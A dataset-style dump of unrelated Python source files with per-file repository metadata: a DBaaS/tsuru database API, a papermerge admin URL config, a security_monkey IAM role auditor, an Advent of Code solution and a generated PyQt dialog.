        database_alocation_limit = self.dbaas_team.database_alocation_limit

        if databases_used_by_team >= database_alocation_limit:
            msg = ("The database alocation limit of {} has been exceeded for "
                   "the selected team: {}").format(
                database_alocation_limit, self.dbaas_team
            )
            return log_and_response(
                msg=msg, http_status=status.HTTP_400_BAD_REQUEST
            )

    def _validate_plan(self):
        if self.env not in self.dbaas_plan.environments.all():
            msg = 'Plan "{}" is not available to "{}" environment'.format(
                self.dbaas_plan, self.env
            )
            # NOTE(review): this returns a (Response, Plan) tuple while every
            # other validator returns a bare Response; post() would then
            # `return err` with the tuple. Looks like a leftover — confirm.
            return log_and_response(
                msg=msg, http_status=status.HTTP_400_BAD_REQUEST
            ), self.dbaas_plan

    def _validate_if_kubernetes_env(self):
        LOG.info("Tsuru Debug headers:{}".format(self.request.META))
        if self.is_k8s_env:
            if not self.pool_param:
                msg = ("the header <{}> was not found "
                       "on headers. Contact tsuru team.".format(
                           self.tsuru_pool_name_header
                       ))
                return log_and_response(
                    msg=msg, http_status=status.HTTP_400_BAD_REQUEST
                )
            if not self.pool_endpoint_param:
                msg = (
                    "the header <{}> "
                    "was not found on headers. Contact tsuru team.".format(
                        self.tsuru_pool_endpoint_header
                    )
                )
                return log_and_response(
                    msg=msg, http_status=status.HTTP_400_BAD_REQUEST
                )
            # NOTE(review): this second pool_endpoint_param check repeats the
            # one above and is unreachable (dead branch) — confirm and remove.
            if not self.pool_endpoint_param:
                msg = (
                    "the header <HTTP_X_TSURU_CLUSTER_ADDRESS> "
                    "was not found on headers. Contact tsuru team."
                )
                return log_and_response(
                    msg=msg, http_status=status.HTTP_400_BAD_REQUEST
                )
            try:
                self.dbaas_pool
            except Pool.DoesNotExist:
                msg = (
                    "Pool with name <{}> and endpoint <{}> was not found"
                ).format(
                    self.pool_param,
                    self.pool_endpoint_param
                )
                return log_and_response(
                    msg=msg, http_status=status.HTTP_400_BAD_REQUEST
                )
            if not self.dbaas_pool.teams.filter(name=self.team_param).exists():
                msg = "The Team <{}> arent on Pool <{}>".format(
                    self.team_param, self.pool_param
                )
                return log_and_response(
                    msg=msg, http_status=status.HTTP_400_BAD_REQUEST
                )
            # Forward the resolved pool to the create task.
            self.extra_params.update({'pool': self.dbaas_pool})

    def post(self, request, format=None):
        # Run all validators in order; the first error Response wins.
        err = self._validate_required_params()
        if err is not None:
            return err
        err = self._validate_search_metadata_params()
        if err is not None:
            return err
        err = self._validate_env()
        if err is not None:
            return err
        err = self._validate_database()
        if err is not None:
            return err
        err = self._validate_user()
        if err is not None:
            return err
        err = self._validate_team()
        if err is not None:
            return err
        err = self._validate_database_alocation()
        if err is not None:
            return err
        err = self._validate_plan()
        if err is not None:
            return err
        err = self._validate_if_kubernetes_env()
        if err is not None:
            return err

        backup_hour, maintenance_hour, maintenance_day = (
            DatabaseForm.randomize_backup_and_maintenance_hour()
        )

        # Creation is asynchronous: register the task and return 201 right away.
        TaskRegister.database_create(
            name=self.name_param,
            plan=self.dbaas_plan,
            environment=self.env,
            team=self.dbaas_team,
            project=None,
            description=self.description_param,
            user=self.dbaas_user,
            is_protected=True,
            backup_hour=backup_hour,
            maintenance_window=maintenance_hour,
            maintenance_day=maintenance_day,
            **self.extra_params
        )
        return Response(status=status.HTTP_201_CREATED)
class ServiceRemove(APIView):
    """Tsuru endpoints to transfer (PUT) or delete (DELETE) a service instance."""

    renderer_classes = (JSONRenderer, JSONPRenderer)
    model = Database

    def put(self, request, database_name, format=None):
        """Transfer the database to another team (tsuru "update instance")."""
        data = request.DATA
        user = data['user']
        team = data['team']
        # NOTE(review): value unused; kept so a payload without 'plan' still
        # fails (KeyError -> 500) exactly as before — confirm it can be dropped.
        data['plan']

        UserMiddleware.set_current_user(request.user)
        # Fix: env was computed twice in a row; get_url_env only reads the
        # request, so one call suffices.
        env = get_url_env(request)
        try:
            database = get_database(database_name, env)
        except IndexError as e:
            msg = "Database id provided does not exist {} in {}.".format(
                database_name, env)
            return log_and_response(
                msg=msg, e=e, http_status=status.HTTP_404_NOT_FOUND
            )

        try:
            dbaas_user = AccountUser.objects.get(email=user)
        except ObjectDoesNotExist as e:
            msg = "User does not exist."
            return log_and_response(
                msg=msg, e=e, http_status=status.HTTP_500_INTERNAL_SERVER_ERROR
            )
        except MultipleObjectsReturned as e:
            msg = "There are multiple user for {} email.".format(user)
            return log_and_response(
                msg=msg, e=e, http_status=status.HTTP_500_INTERNAL_SERVER_ERROR
            )

        try:
            dbaas_team = Team.objects.get(name=team)
        except ObjectDoesNotExist as e:
            msg = "Team does not exist."
            return log_and_response(
                msg=msg, e=e, http_status=status.HTTP_500_INTERNAL_SERVER_ERROR
            )

        # The requesting user must belong to the destination team.
        try:
            dbaas_user.team_set.get(name=dbaas_team.name)
        except ObjectDoesNotExist as e:
            msg = "The user is not on {} team.".format(dbaas_team.name)
            return log_and_response(
                msg=msg, e=e, http_status=status.HTTP_500_INTERNAL_SERVER_ERROR
            )

        database.team = dbaas_team
        database.save()

        return Response(status=status.HTTP_204_NO_CONTENT)

    def delete(self, request, database_name, format=None):
        """Delete the database instance."""
        UserMiddleware.set_current_user(request.user)
        env = get_url_env(request)
        try:
            database = get_database(database_name, env)
        except IndexError as e:
            msg = "Database id provided does not exist {} in {}.".format(
                database_name, env)
            return log_and_response(
                msg=msg, e=e, http_status=status.HTTP_500_INTERNAL_SERVER_ERROR
            )

        database.delete()
        # Bug fix: the status code must go in the `status` keyword; passing
        # it positionally made it the response *body* with HTTP 200
        # (put() above already uses the keyword form).
        return Response(status=status.HTTP_204_NO_CONTENT)
def get_plans_dict(hard_plans):
    """Normalise raw plan dicts for presentation.

    For each plan: build 'description' as "<name>-<environment>", replace
    'name' with a slug of that description, and drop the raw
    'environments__name' key. The input dicts are mutated in place and
    collected into the returned list.
    """
    plans = []
    for plan in hard_plans:
        env_name = plan.pop('environments__name')
        plan['description'] = '{}-{}'.format(plan['name'], env_name)
        plan['name'] = slugify(plan['description'])
        plans.append(plan)
    return plans
def get_url_env(request):
    """Return the environment name encoded as the first URL path segment.

    For a path like "/prod/resources/..." this yields "prod".
    """
    path_segments = request._request.path.split('/')
    return path_segments[1]
def log_and_response(msg, http_status, e="Conditional Error."):
    """Log *msg* and *e* at warning level and wrap *msg* in an error Response.

    Parameters:
        msg: human-readable message included in the response body.
        http_status: HTTP status code for the returned Response.
        e: underlying error (exception or string); logged only.

    Returns:
        Response: DRF Response with body "[DBaaS Error] <msg>".
    """
    # Logger.warn is a deprecated alias of Logger.warning; use the
    # canonical name. (Assumes LOG is a stdlib logging.Logger -- confirm.)
    LOG.warning(msg)
    LOG.warning("Error: {}".format(e))
    return Response("[DBaaS Error] {}".format(msg), http_status)
def last_database_create(database_name, env):
    """This function returns the most recent DatabaseCreate's task.

    Parameters:
        database_name (str): Name of the database
        env (str): It represents the database environment (prod or dev)

    Returns:
        DatabaseCreate: DatabaseCreate object (or None when no task exists)
    """
    creation_tasks = DatabaseCreate.objects.filter(
        name=database_name,
        environment__name=env,
    )
    return creation_tasks.last()
def check_database_status(database_name, env):
    """This function looks for a DatabaseCreate task and returns a http
    response or the Database itself depending on the context. If the
    DatabaseCreate task is still running or failed, a http response is
    returned, otherwise this function tries to retrieve the Database with
    the get_database function.

    Parameters:
        database_name (str): Name of the database
        env (str): It represents the database environment (prod or dev)

    Returns:
        Database or Response: Database or Rest Framework Response object
    """
    database_create = last_database_create(database_name, env)
    LOG.info(
        "Task {}".format(getattr(database_create, 'task', 'No tasks found'))
    )
    if database_create:
        if database_create.is_running:
            # Creation still in progress: caller must retry later (412).
            msg = "Database {} in env {} is being created.".format(
                database_name, env)
            return log_and_response(
                msg=msg, http_status=status.HTTP_412_PRECONDITION_FAILED)
        elif database_create.is_status_error:
            msg = ("An error occurred creating database {} in env {}. Check "
                   "error on task history in https://dbaas.globoi.com").format(
                database_name, env)
            return log_and_response(
                msg=msg, http_status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    try:
        database = get_database(database_name, env)
    except IndexError as e:
        # get_database signals "not found" with IndexError (empty queryset).
        msg = "Database {} does not exist in env {}.".format(
            database_name, env)
        return log_and_response(
            msg=msg, e=e, http_status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except MultipleObjectsReturned as e:
        msg = "There are multiple databases called {} in {}.".format(
            database_name, env)
        return log_and_response(
            msg=msg, e=e, http_status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception as e:
        msg = "Something occurred on dbaas, please get in touch with your DBA."
        return log_and_response(
            msg=msg, e=e, http_status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    if not (database and database.status):
        msg = "Database {} is not Alive.".format(database_name)
        return log_and_response(
            msg=msg, http_status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    return database
def get_network_from_ip(ip, database_environment):
    """Resolve the IPv4 network of *ip* through the Network API.

    Parameters:
        ip: IP address of the unit/host to look up.
        database_environment: environment whose NETWORKAPI credential is used.

    Returns:
        str: network in CIDR notation, e.g. "10.0.0.0/24".
    """
    net_api_credentials = get_credentials_for(
        environment=database_environment,
        credential_type=CredentialType.NETWORKAPI
    )
    ip_client = Ip.Ip(
        net_api_credentials.endpoint, net_api_credentials.user,
        net_api_credentials.password
    )
    ips = ip_client.get_ipv4_or_ipv6(ip)['ips']
    # The API returns a single dict when only one IP matches; normalise
    # to a list so the first entry can be taken uniformly.
    if not isinstance(ips, list):
        ips = [ips]
    net_ip = ips[0]
    network_client = Network.Network(
        net_api_credentials.endpoint, net_api_credentials.user,
        net_api_credentials.password
    )
    network = network_client.get_network_ipv4(net_ip['networkipv4'])['network']
    return '{}.{}.{}.{}/{}'.format(
        network['oct1'], network['oct2'], network['oct3'],
        network['oct4'], network['block']
    )
def get_database(name, env):
    """Fetch the non-quarantined Database called *name* in environment *env*.

    Dev environments are matched exactly; any other value matches the set
    of prod environments. Raises IndexError when no database matches,
    which callers treat as "not found".
    """
    filters = {'name': name}
    if env in Environment.dev_envs():
        filters['environment__name'] = env
    else:
        filters['environment__name__in'] = Environment.prod_envs()
    candidates = Database.objects.filter(
        **filters
    ).exclude(is_in_quarantine=True)
    return candidates[0]
def check_acl_service_and_get_unit_network(database, data,
                                           ignore_ip_error=False):
    """Check the ACL API health for *database*'s environment, then resolve
    the network of the unit host carried in *data*.

    Returns the network string on success, an error Response on failure,
    or None when the IP lookup fails and ignore_ip_error is True.
    """
    try:
        acl_credential = get_credentials_for(
            environment=database.environment,
            credential_type=CredentialType.ACLAPI
        )
    except IndexError:
        error = 'The {} do not have integration with ACLAPI'.format(
            database.environment
        )
        # NOTE(review): a missing ACLAPI credential is reported with
        # HTTP 201 and msg=None (body reads "[DBaaS Error] None") --
        # presumably "no integration" counts as success; confirm intent.
        return log_and_response(
            msg=None, e=error, http_status=status.HTTP_201_CREATED
        )
    health_check_info = acl_credential.get_parameters_by_group('hc')
    try:
        # KeyError from any missing 'hc' parameter is handled below.
        health_check_url = (acl_credential.endpoint
                            + health_check_info['health_check_url'])
        simple_hc = simple_health_check.SimpleHealthCheck(
            health_check_url=health_check_url,
            service_key=health_check_info['key_name'],
            redis_client=REDIS_CLIENT, http_client=requests,
            http_request_exceptions=(Exception,), verify_ssl=False,
            health_check_request_timeout=int(health_check_info['timeout'])
        )
    except KeyError as e:
        msg = "AclApi Credential configured improperly."
        return log_and_response(
            msg=msg, e=e,
            http_status=status.HTTP_500_INTERNAL_SERVER_ERROR
        )
    try:
        simple_hc.check_service()
    except simple_health_check.HealthCheckError as e:
        # A definitive unhealthy answer aborts with 500.
        LOG.warn(e)
        msg = ("We are experiencing errors with the acl api, please try again "
               "later.")
        return log_and_response(
            msg=msg, e=e,
            http_status=status.HTTP_500_INTERNAL_SERVER_ERROR
        )
    except Exception as e:
        # Any other health-check failure is logged and deliberately
        # ignored; execution falls through to the network lookup below.
        LOG.warn(e)
    try:
        return get_network_from_ip(
            data.get('unit-host'), database.environment
        )
    except Exception as e:
        LOG.warn(e)
        msg = ("We are experiencing errors with the network api, please try "
               "get network again later")
        if not ignore_ip_error:
            return log_and_response(
                msg=msg, e=e,
                http_status=status.HTTP_500_INTERNAL_SERVER_ERROR
            )
        # ignore_ip_error=True: fall off the end and return None.
| 34.15122 | 97 | 0.6017 |
ace7625bc8d75f5eb8268a1640f85a5de6b94479 | 2,812 | py | Python | papermerge/contrib/admin/urls.py | PixelJonas/papermerge-core | 2bdb90604a2df403cc21c52b4ef9a394f5b00814 | [
"Apache-2.0"
] | null | null | null | papermerge/contrib/admin/urls.py | PixelJonas/papermerge-core | 2bdb90604a2df403cc21c52b4ef9a394f5b00814 | [
"Apache-2.0"
] | null | null | null | papermerge/contrib/admin/urls.py | PixelJonas/papermerge-core | 2bdb90604a2df403cc21c52b4ef9a394f5b00814 | [
"Apache-2.0"
] | null | null | null | from django.urls import path
from papermerge.contrib.admin import views
app_name = 'admin'
urlpatterns = [
path(
'', views.BrowseView.as_view(), name="index"
),
path(
'inbox/', views.inbox_view, name="inbox"
),
path(
'browse', views.BrowseView.as_view(), name="browse"
),
path(
'search', views.search, name="search"
),
path(
'logs', views.LogsListView.as_view(), name="logs"
),
path(
'log/<int:pk>/',
views.LogUpdateView.as_view(),
name="log-update"
),
path(
'tags/', views.TagsListView.as_view(), name="tags"
),
path(
'tag/add/',
views.TagCreateView.as_view(),
name="tag-add"
),
path(
'tag/<int:pk>/',
views.TagUpdateView.as_view(),
name='tag-update'
),
path(
'groups/',
views.GroupsListView.as_view(),
name='groups'
),
path(
'group/add/',
views.GroupCreateView.as_view(),
name='group-add'
),
path(
'group/<int:pk>/',
views.GroupUpdateView.as_view(),
name='group-update'
),
path(
'users/',
views.UsersListView.as_view(),
name='users'
),
path(
'user/add/',
views.UserCreateView.as_view(),
name='user-add'
),
path(
'user/<int:pk>/',
views.UserUpdateView.as_view(),
name='user-update'
),
path(
'user/<int:pk>/change-password',
views.UserChangePasswordView.as_view(),
name='user-change-password'
),
path(
'roles/',
views.RolesListView.as_view(),
name='roles'
),
path(
'role/add/',
views.RoleCreateView.as_view(),
name='role-add'
),
path(
'role/<int:pk>/',
views.RoleUpdateView.as_view(),
name='role-update'
),
path(
'tokens/',
views.TokensListView.as_view(),
name='tokens'
),
path(
'token/add/',
views.TokenCreateView.as_view(),
name='token-add'
),
path(
'token/<int:pk>/',
views.TokenUpdateView.as_view(),
name='token-update'
),
path(
'automates/',
views.AutomatesListView.as_view(),
name='automates'
),
path(
'automate/add/',
views.AutomateCreateView.as_view(),
name='automate-add'
),
path(
'automate/<int:pk>',
views.AutomateUpdateView.as_view(),
name='automate-update'
),
path(
'preferences/',
views.preferences_view,
name='preferences'
),
path(
'preferences/<str:section>/',
views.preferences_section_view,
name='preferences_section'
),
]
| 21.30303 | 59 | 0.510669 |
ace762bc491bfb0c45032e740fa90c50cc628dac | 4,524 | py | Python | security_monkey/auditors/iam/iam_role.py | security-geeks/security_monkey | e9ce8816f6f85ce886b9f0c01a1a7104289b8ff9 | [
"Apache-2.0"
] | 12 | 2015-09-07T22:27:24.000Z | 2020-04-10T08:56:17.000Z | security_monkey/auditors/iam/iam_role.py | security-geeks/security_monkey | e9ce8816f6f85ce886b9f0c01a1a7104289b8ff9 | [
"Apache-2.0"
] | 2 | 2021-03-20T05:33:09.000Z | 2021-03-26T00:40:13.000Z | security_monkey/auditors/iam/iam_role.py | security-geeks/security_monkey | e9ce8816f6f85ce886b9f0c01a1a7104289b8ff9 | [
"Apache-2.0"
] | 10 | 2015-06-11T05:01:19.000Z | 2020-11-13T11:05:16.000Z | # Copyright 2014 Netflix, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. module: security_monkey.auditors.iam.iam_role
:platform: Unix
.. version:: $$VERSION$$
.. moduleauthor:: Patrick Kelley <pkelley@netflix.com> @monkeysecurity
"""
import json
from security_monkey.watchers.iam.iam_role import IAMRole
from security_monkey.auditors.iam.iam_policy import IAMPolicyAuditor
class IAMRoleAuditor(IAMPolicyAuditor):
    """Audits IAM Roles for overly-permissive policies and trust relationships."""

    index = IAMRole.index
    i_am_singular = IAMRole.i_am_singular
    i_am_plural = IAMRole.i_am_plural

    def __init__(self, accounts=None, debug=False):
        super(IAMRoleAuditor, self).__init__(accounts=accounts, debug=debug)

    def check_star_assume_role_policy(self, iamrole_item):
        """
        alert when an IAM Role has an assume_role_policy_document but using a star
        instead of limiting the assume to a specific IAM Role.
        """
        tag = "{0} allows assume-role from anyone".format(self.i_am_singular)

        def check_statement(statement):
            # Only an Allow of sts:AssumeRole can open the trust policy up.
            if statement.get("Action") != "sts:AssumeRole":
                return
            if statement.get("Effect") != "Allow":
                return
            principal = statement.get("Principal")
            if not isinstance(principal, dict):
                return
            aws = principal.get("AWS")
            if not aws:
                return
            # The AWS principal may be a single string or a list of strings;
            # normalize to a list and flag every wildcard entry.
            # (isinstance also covers dict/list subclasses, which the
            # original `type(...) is ...` checks silently skipped.)
            entries = aws if isinstance(aws, list) else [aws]
            for entry in entries:
                if entry == "*":
                    self.add_issue(10, tag, iamrole_item,
                                   notes=json.dumps(statement))

        assume_role_policy = iamrole_item.config.get(
            "assume_role_policy_document", {})
        statement = assume_role_policy.get("Statement", [])
        # "Statement" may be a single statement object or a list of them.
        if isinstance(statement, dict):
            statement = [statement]
        if isinstance(statement, list):
            for single_statement in statement:
                check_statement(single_statement)

    def check_star_privileges(self, iamrole_item):
        """
        alert when an IAM Role has a policy allowing '*'.
        """
        self.library_check_iamobj_has_star_privileges(
            iamrole_item, policies_key='rolepolicies')

    def check_iam_star_privileges(self, iamrole_item):
        """
        alert when an IAM Role has a policy allowing 'iam:*'.
        """
        self.library_check_iamobj_has_iam_star_privileges(
            iamrole_item, policies_key='rolepolicies')

    def check_iam_privileges(self, iamrole_item):
        """
        alert when an IAM Role has a policy allowing 'iam:XxxxxXxxx'.
        """
        self.library_check_iamobj_has_iam_privileges(
            iamrole_item, policies_key='rolepolicies')

    def check_iam_passrole(self, iamrole_item):
        """
        alert when an IAM Role has a policy allowing 'iam:PassRole'.
        This allows the role to pass any role specified in the resource block to an ec2 instance.
        """
        self.library_check_iamobj_has_iam_passrole(
            iamrole_item, policies_key='rolepolicies')

    def check_notaction(self, iamrole_item):
        """
        alert when an IAM Role has a policy containing 'NotAction'.
        NotAction combined with an "Effect": "Allow" often provides more privilege
        than is desired.
        """
        self.library_check_iamobj_has_notaction(
            iamrole_item, policies_key='rolepolicies')

    def check_security_group_permissions(self, iamrole_item):
        """
        alert when an IAM Role has ec2:AuthorizeSecurityGroupEgress or ec2:AuthorizeSecurityGroupIngress.
        """
        self.library_check_iamobj_has_security_group_permissions(
            iamrole_item, policies_key='rolepolicies')
| 41.888889 | 107 | 0.64191 |
ace762d4f844d297eed8c09143dccd705ba7cb20 | 521 | py | Python | src/advent/year2020/day15.py | davidism/advent | 761756f179c3547f44ec035880f29f58d80903f8 | [
"BSD-3-Clause"
] | 5 | 2019-12-09T06:02:22.000Z | 2021-12-03T18:02:49.000Z | src/advent/year2020/day15.py | davidism/advent | 761756f179c3547f44ec035880f29f58d80903f8 | [
"BSD-3-Clause"
] | null | null | null | src/advent/year2020/day15.py | davidism/advent | 761756f179c3547f44ec035880f29f58d80903f8 | [
"BSD-3-Clause"
] | 2 | 2019-09-19T04:44:33.000Z | 2021-05-09T14:39:58.000Z | from collections import defaultdict
from collections import deque
from itertools import count
data = 7, 14, 0, 17, 11, 1, 2
heard = defaultdict(
lambda: deque(maxlen=2),
((x, deque([i], 2)) for i, x in enumerate(data, 1)),
)
spoke = data[-1]
for i in count(len(data) + 1):
if len(heard[spoke]) == 1:
spoke = 0
else:
spoke = heard[spoke][1] - heard[spoke][0]
heard[spoke].append(i)
if i == 2020:
print(spoke)
elif i == 30_000_000:
print(spoke)
break
| 20.84 | 56 | 0.585413 |
ace762f1ecdd72641038f5b2b59ea5b13c9daf0e | 2,394 | py | Python | src/ui/EdceVerificationUI.py | BeTeK/EliteDB | a6ff655f6f78b227bebaaf48d7aa7c8742871011 | [
"BSD-3-Clause"
] | 7 | 2015-06-04T19:46:50.000Z | 2015-07-13T14:15:27.000Z | src/ui/EdceVerificationUI.py | BeTeK/EliteDB | a6ff655f6f78b227bebaaf48d7aa7c8742871011 | [
"BSD-3-Clause"
] | 3 | 2015-06-05T13:08:59.000Z | 2015-07-16T21:39:00.000Z | src/ui/EdceVerificationUI.py | BeTeK/EliteDB | a6ff655f6f78b227bebaaf48d7aa7c8742871011 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'src\ui\EdceVerification.ui'
#
# Created by: PyQt5 UI code generator 5.4.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
    # Generated by pyuic5 from EdceVerification.ui; regenerate from the
    # .ui file rather than hand-editing (see the warning in the header).

    def setupUi(self, Dialog):
        """Create and lay out the dialog's widgets."""
        Dialog.setObjectName("Dialog")
        Dialog.resize(373, 345)
        self.gridLayout_2 = QtWidgets.QGridLayout(Dialog)
        self.gridLayout_2.setObjectName("gridLayout_2")
        # Bottom row: a horizontal spacer pushes Cancel/Ok to the right.
        self.horizontalLayout = QtWidgets.QHBoxLayout()
        self.horizontalLayout.setObjectName("horizontalLayout")
        spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem)
        self.cancelBtn = QtWidgets.QPushButton(Dialog)
        self.cancelBtn.setObjectName("cancelBtn")
        self.horizontalLayout.addWidget(self.cancelBtn)
        self.okBtn = QtWidgets.QPushButton(Dialog)
        self.okBtn.setObjectName("okBtn")
        self.horizontalLayout.addWidget(self.okBtn)
        self.gridLayout_2.addLayout(self.horizontalLayout, 3, 0, 1, 1)
        # Prompt label at the top of the dialog.
        self.gridLayout = QtWidgets.QGridLayout()
        self.gridLayout.setObjectName("gridLayout")
        self.label = QtWidgets.QLabel(Dialog)
        self.label.setObjectName("label")
        self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
        self.gridLayout_2.addLayout(self.gridLayout, 0, 0, 1, 1)
        # Input field for the verification code sent by email.
        self.verificationCodeTxt = QtWidgets.QLineEdit(Dialog)
        self.verificationCodeTxt.setObjectName("verificationCodeTxt")
        self.gridLayout_2.addWidget(self.verificationCodeTxt, 1, 0, 1, 1)
        # Vertical spacer keeps the widgets anchored toward the top.
        spacerItem1 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.gridLayout_2.addItem(spacerItem1, 2, 0, 1, 1)
        self.retranslateUi(Dialog)
        QtCore.QMetaObject.connectSlotsByName(Dialog)

    def retranslateUi(self, Dialog):
        """Set all user-visible strings (kept separate for Qt translation)."""
        _translate = QtCore.QCoreApplication.translate
        Dialog.setWindowTitle(_translate("Dialog", "Edce verification"))
        self.cancelBtn.setText(_translate("Dialog", "Cancel"))
        self.okBtn.setText(_translate("Dialog", "Ok"))
        self.label.setText(_translate("Dialog", "Verification code needed. Check your email and insert code here."))
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.